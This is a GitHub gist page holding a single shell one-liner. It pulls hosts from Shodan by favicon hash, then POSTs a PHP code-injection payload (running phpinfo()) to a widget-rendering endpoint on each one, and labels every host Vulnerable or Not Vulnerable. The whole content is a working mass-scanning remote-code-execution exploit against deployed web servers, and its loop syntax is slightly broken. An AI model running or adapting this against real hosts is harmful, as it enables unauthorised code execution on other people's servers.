Skip to content

Instantly share code, notes, and snippets.

@Mad-robot
Created August 10, 2020 13:42
Show Gist options
  • Star 6 You must be signed in to star a gist
  • Fork 5 You must be signed in to fork a gist
  • Save Mad-robot/58f0d5fad92566a3a8766d5ecaf8f19b to your computer and use it in GitHub Desktop.
Save Mad-robot/58f0d5fad92566a3a8766d5ecaf8f19b to your computer and use it in GitHub Desktop.
shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done;
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment